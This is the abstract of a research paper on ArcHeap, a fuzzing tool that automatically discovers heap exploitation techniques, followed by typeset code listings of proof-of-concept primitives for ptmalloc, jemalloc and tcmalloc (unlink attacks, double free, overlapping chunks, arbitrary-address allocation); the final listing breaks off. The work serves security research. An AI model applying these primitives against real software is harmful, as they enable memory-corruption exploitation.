Automatic Techniques to Systematically Discover New Heap Exploitation Primitives

Heap exploitation techniques to abuse the metadata of allocators have been widely studied since they are application independent and can be used in restricted environments that corrupt only metadata. Although prior work has found several interesting exploitation techniques, they are ad-hoc and manual, which cannot effectively handle changes or a variety of allocators. In this paper, we present a new naming scheme for heap exploitation techniques that systematically organizes them to discover the unexplored space in finding the techniques and ArcHeap, the tool that finds heap exploitation techniques automatically and systematically regardless of their underlying implementations. For that, ArcHeap generates a set of heap actions (e.g. allocation or deallocation) by leveraging fuzzing, which exploits common designs of modern heap allocators. Then, ArcHeap checks whether the actions result in impact of exploitations such as arbitrary write or overlapped chunks that efficiently determine if the actions can be converted into the exploitation technique. Finally, from these actions, ArcHeap generates Proof-of-Concept code automatically for an exploitation technique. We evaluated ArcHeap with real-world allocators --- ptmalloc, jemalloc, and tcmalloc --- and custom allocators from the DARPA Cyber Grand Challenge. ArcHeap successfully found 14 out of 16 known exploitation techniques and found five new exploitation techniques in ptmalloc. Moreover, ArcHeap found several exploitation techniques for jemalloc, tcmalloc, and even for the custom allocators. Further, ArcHeap can automatically show changes in exploitation techniques along with version change in ptmalloc using differential testing.

==> code/fast-bin-to-other-bin.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
  \PY{c+c1}{// [PRE\PYZhy{}CONDITION]}
  \PY{c+c1}{//    fsz: any fast bin size}
  \PY{c+c1}{//    sz: any non\PYZhy{}fast\PYZhy{}bin size}
  \PY{c+c1}{//    lsz: any largebin size}
  \PY{c+c1}{// [BUG] write free memory}
  \PY{c+c1}{// [POST\PYZhy{}CONDITION]}
  \PY{c+c1}{//    malloc(sz) = fake \PYZhy{} offsetof(struct malloc\PYZus{}chunk, fd)}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p1} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{fsz}\PY{p}{)}\PY{p}{;}
  \PY{n}{free}\PY{p}{(}\PY{n}{p1}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// create a fake chunk}
  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk} \PY{o}{*}\PY{n}{fake} \PY{o}{=} \PY{n}{dst}\PY{p}{;}
  \PY{c+c1}{// set P=1 to avoid a security check}
  \PY{n}{fake}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{=} \PY{n}{chunk\PYZus{}size}\PY{p}{(}\PY{n}{sz}\PY{p}{)} \PY{o}{|} \PY{l+m+mi}{1}\PY{p}{;}
  \PY{n}{fake}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{fd} \PY{o}{=} \PY{n+nb}{NULL}\PY{p}{;}

  \PY{c+c1}{// create \PYZsq{}fake2\PYZsq{}: a next chunk of \PYZsq{}fake\PYZsq{}}
  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk} \PY{o}{*}\PY{n}{fake2} \PY{o}{=} \PY{n}{dst} \PY{o}{+} \PY{n}{chunk\PYZus{}size}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// set P=1 to avoid a security check}
  \PY{n}{fake2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{=} \PY{l+m+mi}{1}\PY{p}{;}

  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk} \PY{o}{*}\PY{n}{c1} \PY{o}{=} \PY{n}{raw\PYZus{}to\PYZus{}chunk}\PY{p}{(}\PY{n}{p1}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// [BUG] set a forward pointer of fast bin into fake}
  \PY{c+c1}{// this can be done by a normal heap write since p4 is allocated}
  \PY{n}{c1}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{fd} \PY{o}{=} \PY{n}{fake}\PY{p}{;}

  \PY{c+c1}{// now a fast bin list: c1 \PYZhy{}\PYZgt{} fake}
  \PY{c+c1}{// call malloc\PYZus{}consolidate to move}
  \PY{c+c1}{// \PYZsq{}fake\PYZsq{} to the unsorted bin}
  \PY{n}{malloc}\PY{p}{(}\PY{n}{lsz}\PY{p}{)}\PY{p}{;}

  \PY{n}{assert}\PY{p}{(}\PY{n}{raw\PYZus{}to\PYZus{}chunk}\PY{p}{(}\PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{)} \PY{o}{=}\PY{o}{=} \PY{n}{fake}\PY{p}{)}\PY{p}{;}
\end{Verbatim}


==> code/house-of-unsorted-einherjar.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
  \PY{c+c1}{// [PRE\PYZhy{}CONDITION]}
  \PY{c+c1}{//    sz: small bin size}
  \PY{c+c1}{//    assert(chunk\PYZus{}size(sz) \PYZam{} 0xff == 0);}
  \PY{c+c1}{// [BUG] off\PYZhy{}by\PYZhy{}one NULL}
  \PY{c+c1}{// [POST\PYZhy{}CONDITION]}
  \PY{c+c1}{//    assert(raw\PYZus{}to\PYZus{}chunk(malloc(sz)) == fake);}

  \PY{c+c1}{// the lowest byte of chunk\PYZus{}size(sz) needs to be zero}
  \PY{c+c1}{// to avoid chaning its size when triggering a bug}
  \PY{c+c1}{// assert(chunk\PYZus{}size(sz) \PYZam{} 0xff == 0);}
  \PY{k+kt}{char} \PY{o}{*}\PY{n}{p1} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{k+kt}{char} \PY{o}{*}\PY{n}{p2} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{k+kt}{char} \PY{o}{*}\PY{n}{p3} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{k+kt}{char} \PY{o}{*}\PY{n}{p4} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// move p1 to unsorted bin}
  \PY{n}{free}\PY{p}{(}\PY{n}{p1}\PY{p}{)}\PY{p}{;}

  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{o}{*} \PY{n}{c3} \PY{o}{=} \PY{n}{raw\PYZus{}to\PYZus{}chunk}\PY{p}{(}\PY{n}{p3}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// make prev\PYZus{}size into double to cover a large chunk}
  \PY{c+c1}{// this is valid by writing p2\PYZsq{}s last data}
  \PY{n}{c3}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{prev\PYZus{}size} \PY{o}{=} \PY{n}{chunk\PYZus{}size}\PY{p}{(}\PY{n}{sz}\PY{p}{)} \PY{o}{*} \PY{l+m+mi}{2}\PY{p}{;}
  \PY{c+c1}{// [BUG] use off\PYZhy{}by\PYZhy{}one NULL to make P=0 in c3}
  \PY{n}{assert}\PY{p}{(}\PY{p}{(}\PY{n}{c3}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{\PYZam{}} \PY{l+m+mh}{0xff}\PY{p}{)} \PY{o}{=}\PY{o}{=} \PY{l+m+mh}{0x01}\PY{p}{)}\PY{p}{;}
  \PY{n}{c3}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{\PYZam{}}\PY{o}{=} \PY{o}{\PYZti{}}\PY{l+m+mi}{1}\PY{p}{;}

  \PY{c+c1}{// this will merge p1 \PYZam{} p3}
  \PY{n}{free}\PY{p}{(}\PY{n}{p3}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// if we allocate p5,}
  \PY{c+c1}{// p2 is now points to a free chunk in the unsorted bin}
  \PY{k+kt}{char} \PY{o}{*}\PY{n}{p5} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// it\PYZsq{}s unsorted bin into stack}
  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{o}{*} \PY{n}{fake} \PY{o}{=} \PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{p}{)}\PY{n}{buf}\PY{p}{;}
  \PY{c+c1}{// set fake\PYZhy{}\PYZgt{}size to chunk\PYZus{}size(sz) for later allocation}
  \PY{n}{fake}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{=} \PY{n}{chunk\PYZus{}size}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// set fake\PYZhy{}\PYZgt{}bk to any writable address to avoid crash}
  \PY{n}{fake}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{bk} \PY{o}{=} \PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{p}{)}\PY{n}{buf}\PY{p}{;}

  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{o}{*} \PY{n}{c2} \PY{o}{=} \PY{n}{raw\PYZus{}to\PYZus{}chunk}\PY{p}{(}\PY{n}{p2}\PY{p}{)}\PY{p}{;}
  \PY{n}{c2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{bk} \PY{o}{=} \PY{n}{fake}\PY{p}{;}

  \PY{n}{assert}\PY{p}{(}\PY{n}{raw\PYZus{}to\PYZus{}chunk}\PY{p}{(}\PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{)} \PY{o}{=}\PY{o}{=} \PY{n}{fake}\PY{p}{)}\PY{p}{;}
\end{Verbatim}


==> code/jemalloc-double-free.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
  \PY{c+c1}{// [PRE\PYZhy{}CONDITION]}
  \PY{c+c1}{//    sz : any size}
  \PY{c+c1}{// [BUG] double free}
  \PY{c+c1}{// [POST\PYZhy{}CONDITION]}
  \PY{c+c1}{//    malloc(sz) == malloc(sz)}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{n}{free}\PY{p}{(}\PY{n}{p}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// [BUG] free \PYZsq{}p\PYZsq{} again}
  \PY{c+c1}{// this is allowed due to lack of security checks}
  \PY{n}{free}\PY{p}{(}\PY{n}{p}\PY{p}{)}\PY{p}{;}

  \PY{n}{assert}\PY{p}{(}\PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)} \PY{o}{=}\PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{)}\PY{p}{;}
\end{Verbatim}


==> code/new-unlink-exploit.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
  \PY{c+c1}{// Same PRE/POST CONDITIONS and BUG as (b)}
  \PY{k+kt}{void} \PY{o}{*}\PY{n}{p1} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{k+kt}{void} \PY{o}{*}\PY{n}{p2} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}

  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk} \PY{o}{*}\PY{n}{fake} \PY{o}{=} \PY{n}{p1}\PY{p}{;}
  \PY{c+c1}{// bypassing (1): P\PYZhy{}\PYZgt{}size == next\PYZus{}chunk(P)\PYZhy{}\PYZgt{}prev\PYZus{}size}
  \PY{n}{fake}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{=} \PY{k}{sizeof}\PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// bypassing (2): P\PYZhy{}\PYZgt{}fd\PYZhy{}\PYZgt{}bk == P \PYZam{}\PYZam{} P\PYZhy{}\PYZgt{}bk\PYZhy{}\PYZgt{}fd == P}
  \PY{n}{fake}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{fd} \PY{o}{=} \PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{p}{)}\PY{o}{\PYZam{}}\PY{n}{p1} \PY{o}{\PYZhy{}} \PY{n}{offsetof}\PY{p}{(}\PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{p}{,} \PY{n}{bk}\PY{p}{)}\PY{p}{;}
  \PY{n}{fake}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{bk} \PY{o}{=} \PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{p}{)}\PY{o}{\PYZam{}}\PY{n}{p1} \PY{o}{\PYZhy{}} \PY{n}{offsetof}\PY{p}{(}\PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{p}{,} \PY{n}{fd}\PY{p}{)}\PY{p}{;}

  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk} \PY{o}{*}\PY{n}{c2} \PY{o}{=} \PY{n}{raw\PYZus{}to\PYZus{}chunk}\PY{p}{(}\PY{n}{p2}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// [BUG] overflowing p1: it shrinks the previous chunk\PYZsq{}s size,}
  \PY{c+c1}{// tricking `fake\PYZsq{} as the previous chunk}
  \PY{n}{c2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{prev\PYZus{}size} \PY{o}{=} \PY{n}{chunk\PYZus{}size}\PY{p}{(}\PY{n}{sz}\PY{p}{)} \PYZbs{}
                  \PY{o}{\PYZhy{}} \PY{n}{offsetof}\PY{p}{(}\PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{p}{,} \PY{n}{fd}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// tricking the previous chunk freed, P=0}
  \PY{n}{c2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{\PYZam{}}\PY{o}{=} \PY{o}{\PYZti{}}\PY{l+m+mi}{1}\PY{p}{;}

  \PY{c+c1}{// triggering unlink(fake) via backward consolidation}
  \PY{n}{free}\PY{p}{(}\PY{n}{p2}\PY{p}{)}\PY{p}{;}

  \PY{n}{assert}\PY{p}{(}\PY{n}{p1} \PY{o}{=}\PY{o}{=} \PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{p}{)}\PY{o}{\PYZam{}}\PY{n}{p1} \PY{o}{\PYZhy{}} \PY{n}{offsetof}\PY{p}{(}\PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{p}{,} \PY{n}{bk}\PY{p}{)}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// writing with p1: overwriting itself to dst}
  \PY{o}{*}\PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{o}{*}\PY{p}{)}\PY{p}{(}\PY{n}{p1} \PY{o}{+} \PY{n}{offsetof}\PY{p}{(}\PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{p}{,} \PY{n}{bk}\PY{p}{)}\PY{p}{)} \PY{o}{=} \PY{n}{target}\PY{p}{;}
  \PY{c+c1}{// writing with p1: overwriting *dst with val}
  \PY{o}{*}\PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{o}{*}\PY{p}{)}\PY{n}{p1} \PY{o}{=} \PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{p}{)}\PY{n}{val}\PY{p}{;}

  \PY{n}{assert}\PY{p}{(}\PY{o}{*}\PY{n}{dst} \PY{o}{=}\PY{o}{=} \PY{n}{val}\PY{p}{)}\PY{p}{;}
\end{Verbatim}


==> code/new-unlink.h.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
\PY{k+kt}{\PYZsh{}define} \PY{n+nf}{unlink}\PY{p}{(}\PY{n}{AV}\PY{p}{,} \PY{n}{P}\PY{p}{,} \PY{n}{BK}\PY{p}{,} \PY{n}{FD}\PY{p}{)}                                    \PYZbs{}
    \PY{c+cm}{/* (1) checking if size == the next chunk\PYZsq{}s prev\PYZus{}size */}     \PYZbs{}
$\star$   \PY{k}{if} \PY{p}{(}\PY{n}{chunksize}\PY{p}{(}\PY{n}{P}\PY{p}{)} \PY{o}{!}\PY{o}{=} \PY{n}{prev\PYZus{}size}\PY{p}{(}\PY{n}{next\PYZus{}chunk}\PY{p}{(}\PY{n}{P}\PY{p}{)}\PY{p}{)}\PY{p}{)}                \PYZbs{}
$\star$     \PY{n}{malloc\PYZus{}printerr}\PY{p}{(}\PY{l+s}{\PYZdq{}}\PY{l+s}{corrupted size vs. prev\PYZus{}size}\PY{l+s}{\PYZdq{}}\PY{p}{)}\PY{p}{;}           \PYZbs{}
    \PY{n}{FD} \PY{o}{=} \PY{n}{P}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{fd}\PY{p}{;}                                                  \PYZbs{}
    \PY{n}{BK} \PY{o}{=} \PY{n}{P}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{bk}\PY{p}{;}                                                  \PYZbs{}
    \PY{c+cm}{/* (2) checking if prev/next chunks correctly point to me */} \PYZbs{}
$\star$   \PY{n+nf}{if} \PY{p}{(}\PY{n}{FD}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{bk} \PY{o}{!}\PY{o}{=} \PY{n}{P} \PY{o}{|}\PY{o}{|} \PY{n}{BK}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{fd} \PY{o}{!}\PY{o}{=} \PY{n}{P}\PY{p}{)}                              \PYZbs{}
$\star$     \PY{n}{malloc\PYZus{}printerr}\PY{p}{(}\PY{l+s}{\PYZdq{}}\PY{l+s}{corrupted double\PYZhy{}linked list}\PY{l+s}{\PYZdq{}}\PY{p}{)}\PY{p}{;}           \PYZbs{}
$\star$   \PY{k}{else} \PY{p}{\PYZob{}}                                                       \PYZbs{}
      \PY{n}{FD}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{bk} \PY{o}{=} \PY{n}{BK}\PY{p}{;}                                               \PYZbs{}
      \PY{n}{BK}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{fd} \PY{o}{=} \PY{n}{FD}\PY{p}{;}                                               \PYZbs{}
      \PY{p}{.}\PY{p}{.}\PY{p}{.}                                                        \PYZbs{}
$\star$    \PY{p}{\PYZcb{}}
\end{Verbatim}


==> code/old-unlink-exploit.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
  \PY{c+c1}{// [PRE\PYZhy{}CONDITION]}
  \PY{c+c1}{//   sz : any non\PYZhy{}fast\PYZhy{}bin size}
  \PY{c+c1}{//   dst: where to write (void*)}
  \PY{c+c1}{//   val: target value (ptr to writable memory)}
  \PY{c+c1}{// [BUG] buffer overflow (p1)}
  \PY{c+c1}{// [POST\PYZhy{}CONDITION]}
  \PY{c+c1}{//   *dst = val}
  \PY{k+kt}{void} \PY{o}{*}\PY{n}{p1} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{k+kt}{void} \PY{o}{*}\PY{n}{p2} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}

  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk} \PY{o}{*}\PY{n}{c2} \PY{o}{=} \PY{n}{raw\PYZus{}to\PYZus{}chunk}\PY{p}{(}\PY{n}{p2}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// [BUG] overflowing p1}
  \PY{n}{c2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{prev\PYZus{}size} \PY{o}{=} \PY{l+m+mi}{0}\PY{p}{;}
  \PY{c+c1}{// next chunk\PYZsq{}s size == c2\PYZsq{}s prev\PYZus{}size, tricking c2 freed (P=0)}
  \PY{n}{c2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{=} \PY{o}{\PYZhy{}}\PY{k}{sizeof}\PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{p}{)}\PY{p}{;}
  \PY{n}{c2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{fd} \PY{o}{=} \PY{n}{dst} \PY{o}{\PYZhy{}} \PY{n}{offsetof}\PY{p}{(}\PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{p}{,} \PY{n}{bk}\PY{p}{)}\PY{p}{;}
  \PY{n}{c2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{bk} \PY{o}{=} \PY{n}{val}\PY{p}{;}

  \PY{c+c1}{// trigger unlink(c2) via forward consolidation}
  \PY{n}{free}\PY{p}{(}\PY{n}{p1}\PY{p}{)}\PY{p}{;}

  \PY{n}{assert}\PY{p}{(}\PY{o}{*}\PY{n}{dst} \PY{o}{=}\PY{o}{=} \PY{n}{val}\PY{p}{)}\PY{p}{;}
\end{Verbatim}


==> code/overlapping-chunks-smallbin.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
  \PY{c+c1}{// [PRE\PYZhy{}CONDITION]}
  \PY{c+c1}{//    sz : any small bin size}
  \PY{c+c1}{//    sz2 : any small bin size}
  \PY{c+c1}{//    assert(sz2 \PYZgt{} sz)}
  \PY{c+c1}{// [BUG] buffer overflow}
  \PY{c+c1}{// [POST\PYZhy{}CONDITION]}
  \PY{c+c1}{//    two chunks overlap}

  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p1} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p2} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p3} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// move p2 to the unsorted bin}
  \PY{n}{free}\PY{p}{(}\PY{n}{p2}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// move p2 to the small bin}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p4} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz2}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// [BUG] overflowing p1}
  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk} \PY{o}{*}\PY{n}{c2} \PY{o}{=} \PY{n}{raw\PYZus{}to\PYZus{}chunk}\PY{p}{(}\PY{n}{p2}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// growing size into double}
  \PY{n}{c2}\PY{o}{\PYZhy{}}\PY{o}{\PYZgt{}}\PY{n}{size} \PY{o}{=} \PY{l+m+mi}{2} \PY{o}{*} \PY{n}{chunk\PYZus{}size}\PY{p}{(}\PY{n}{sz}\PY{p}{)} \PY{o}{|} \PY{l+m+mi}{1}\PY{p}{;}

  \PY{c+c1}{// p5\PYZsq{}s chunk size = chunk\PYZus{}size(sz) * 2}
  \PY{k+kt}{void} \PY{o}{*}\PY{n}{p5} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// move p5 to the unsorted bin}
  \PY{n}{free}\PY{p}{(}\PY{n}{p5}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// splitting p5 into half and returning p6}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p6} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// returning the remainder}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p7} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// p3 and p7 overlap}
  \PY{n}{assert}\PY{p}{(}\PY{n}{p3} \PY{o}{=}\PY{o}{=} \PY{n}{p7}\PY{p}{)}\PY{p}{;}
\end{Verbatim}


==> code/ptmalloc-metadata.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
\PY{k}{struct} \PY{n}{malloc\PYZus{}chunk} \PY{p}{\PYZob{}}
  \PY{c+c1}{// size of \PYZdq{}previous\PYZdq{} chunk}
  \PY{c+c1}{//  (only valid when the previous chunk is freed, P=0)}
  \PY{k+kt}{size\PYZus{}t} \PY{n}{prev\PYZus{}size}\PY{p}{;}  
  
  \PY{c+c1}{// size in bytes (aligned by double words): lower bits}
  \PY{c+c1}{// indicate various states of the current/previous chunk}
  \PY{c+c1}{//   A: alloced in a non\PYZhy{}main arena}
  \PY{c+c1}{//   M: mmapped}
  \PY{c+c1}{//   P: \PYZdq{}previous\PYZdq{} in use (i.e., P=0 means freed)}
  \PY{k+kt}{size\PYZus{}t} \PY{n}{size}\PY{p}{;}

  \PY{c+c1}{// double links for free chunks in small/large bins}
  \PY{c+c1}{//  (only valid when this chunk is freed)}
  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{o}{*} \PY{n}{fd}\PY{p}{;}
  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{o}{*} \PY{n}{bk}\PY{p}{;}
  
  \PY{c+c1}{// double links for next larger/smaller size in largebins}
  \PY{c+c1}{//  (only valid when this chunk is freed)}
  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{o}{*} \PY{n}{fd\PYZus{}nextsize}\PY{p}{;}
  \PY{k}{struct} \PY{n}{malloc\PYZus{}chunk}\PY{o}{*} \PY{n}{bk\PYZus{}nextsize}\PY{p}{;}
\PY{p}{\PYZcb{}}\PY{p}{;}
\end{Verbatim}


==> code/tcmalloc-arbitrary-address-return.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
  \PY{c+c1}{// [PRE\PYZhy{}CONDITION]}
  \PY{c+c1}{//    sz : any size}
  \PY{c+c1}{// [BUG] buffer overflow}
  \PY{c+c1}{// [POST\PYZhy{}CONDITION]}
  \PY{c+c1}{//    malloc(sz) == dst}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}
  \PY{c+c1}{// [BUG] overflowing p}
  \PY{c+c1}{// tcmalloc has a next chunk address at the end of a chunk}
  \PY{o}{*}\PY{p}{(}\PY{k+kt}{void}\PY{o}{*}\PY{o}{*}\PY{p}{)}\PY{p}{(}\PY{n}{p} \PY{o}{+} \PY{n}{malloc\PYZus{}usable\PYZus{}size}\PY{p}{(}\PY{n}{p}\PY{p}{)}\PY{p}{)} \PY{o}{=} \PY{n}{dst}\PY{p}{;}

  \PY{c+c1}{// this malloc changes a next chunk address into dst}
  \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}

  \PY{n}{assert}\PY{p}{(}\PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)} \PY{o}{=}\PY{o}{=} \PY{n}{dst}\PY{p}{)}\PY{p}{;}
\end{Verbatim}


==> code/tcmalloc-duplicate.c.tex <==
\begin{Verbatim}[commandchars=\\\{\},codes={\catcode`\$=3\catcode`\^=7\catcode`\_=8}]
  \PY{c+c1}{// [PRE\PYZhy{}CONDITION]}
  \PY{c+c1}{//    sz : any size \PYZlt{} 0x100}
  \PY{c+c1}{// [BUG] off\PYZhy{}by\PYZhy{}one null overflow}
  \PY{c+c1}{// [POST\PYZhy{}CONDITION]}
  \PY{c+c1}{//    malloc(sz) == already allocated one}
  \PY{k+kt}{void}\PY{o}{*} \PY{n}{p} \PY{o}{=} \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// p\PYZsq{}s lowest byte is zero in tcmalloc}
  \PY{n}{assert}\PY{p}{(}\PY{p}{(}\PY{k+kt}{intptr\PYZus{}t}\PY{p}{)}\PY{n}{p} \PY{o}{\PYZam{}} \PY{l+m+mh}{0xff} \PY{o}{=}\PY{o}{=} \PY{l+m+mi}{0}\PY{p}{)}\PY{p}{;}

  \PY{c+c1}{// [BUG] off\PYZhy{}by\PYZhy{}one\PYZhy{}null overflow}
  \PY{c+c1}{// it clears a lowest byte of a next chunk address}
  \PY{c+c1}{// to make the next chunk same with \PYZsq{}p\PYZsq{}}
  \PY{o}{*}\PY{p}{(}\PY{k+kt}{char}\PY{o}{*}\PY{p}{)}\PY{p}{(}\PY{n}{p} \PY{o}{+} \PY{n}{malloc\PYZus{}usable\PYZus{}size}\PY{p}{(}\PY{n}{p}\PY{p}{)}\PY{p}{)} \PY{o}{=} \PY{l+m+mi}{0}\PY{p}{;}

  \PY{c+c1}{// it updates the next chunk address == \PYZsq{}p\PYZsq{}}
  \PY{n}{malloc}\PY{p}{(}\PY{n}{sz}\PY{p}{)}\PY{p}{;}

